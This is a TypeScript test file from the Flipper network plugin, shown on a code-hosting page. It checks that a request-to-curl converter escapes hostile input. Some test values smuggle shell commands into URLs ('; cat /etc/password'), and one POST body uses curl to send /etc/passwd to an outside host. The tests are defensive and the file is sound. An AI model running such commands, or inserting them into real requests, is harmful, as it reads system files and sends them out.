jens/flipper
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
72e34bbd0d95a036719c02143bdd666e954448ef
flipper/desktop/plugins/public/network/__tests__/requestToCurlCommand.node.tsx
Michel Weststrate 72e34bbd0d Parse request bodies eagerly 
Summary:
Currently the network plugin was always storing the transfer format of our request/ response bodies: a base64 string. However, those are not searchable, and every formatter (and multiple can be invoked in a single view) was responsible for its own decompressing.

This diff changes parsing requests / responses into an accurate format: a decompressed, de-base64-ed utf8 string, or a Uint8array for binary data.

We will use this in the next diffs to do some more efficient searching

Reviewed By: passy

Differential Revision: D28200190

fbshipit-source-id: 33a71aeb7b340b58305e97fff4fa5ce472169b25
2021-05-06 04:27:59 -07:00

147 lines
4.0 KiB
TypeScript
Raw Blame History

/**
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*
* @format
*/
import {convertRequestToCurlCommand} from '../utils';
test('convertRequestToCurlCommand: simple GET', () => {
const request = {
id: 'request id',
timestamp: 1234567890,
method: 'GET',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: undefined,
};
const command = convertRequestToCurlCommand(request);
expect(command).toEqual("curl -v -X GET 'https://fbflipper.com/'");
});
test('convertRequestToCurlCommand: simple POST', () => {
const request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: 'some=data&other=param',
};
const command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/' -d 'some=data&other=param'",
);
});
test('convertRequestToCurlCommand: malicious POST URL', () => {
let request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: "https://fbflipper.com/'; cat /etc/password",
requestHeaders: [],
requestData: 'some=data&other=param',
};
let command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST $'https://fbflipper.com/\\'; cat /etc/password' -d 'some=data&other=param'",
);
request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/"; cat /etc/password',
requestHeaders: [],
requestData: 'some=data&other=param',
};
command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/\"; cat /etc/password' -d 'some=data&other=param'",
);
});
test('convertRequestToCurlCommand: malicious POST URL', () => {
let request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: "https://fbflipper.com/'; cat /etc/password",
requestHeaders: [],
requestData: 'some=data&other=param',
};
let command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST $'https://fbflipper.com/\\'; cat /etc/password' -d 'some=data&other=param'",
);
request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/"; cat /etc/password',
requestHeaders: [],
requestData: 'some=data&other=param',
};
command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/\"; cat /etc/password' -d 'some=data&other=param'",
);
});
test('convertRequestToCurlCommand: malicious POST data', () => {
let request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: 'some=\'; curl https://somewhere.net -d "$(cat /etc/passwd)"',
};
let command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/' -d $'some=\\'; curl https://somewhere.net -d \"$(cat /etc/passwd)\"'",
);
request = {
id: 'request id',
timestamp: 1234567890,
method: 'POST',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: 'some=!!',
};
command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X POST 'https://fbflipper.com/' -d $'some=\\u21\\u21'",
);
});
test('convertRequestToCurlCommand: control characters', () => {
const request = {
id: 'request id',
timestamp: 1234567890,
method: 'GET',
url: 'https://fbflipper.com/',
requestHeaders: [],
requestData: 'some=\u0007 \u0009 \u000C \u001B&other=param',
};
const command = convertRequestToCurlCommand(request);
expect(command).toEqual(
"curl -v -X GET 'https://fbflipper.com/' -d $'some=\\u07 \\u09 \\u0c \\u1b&other=param'",
);
});
Reference in New Issue View Git Blame Copy Permalink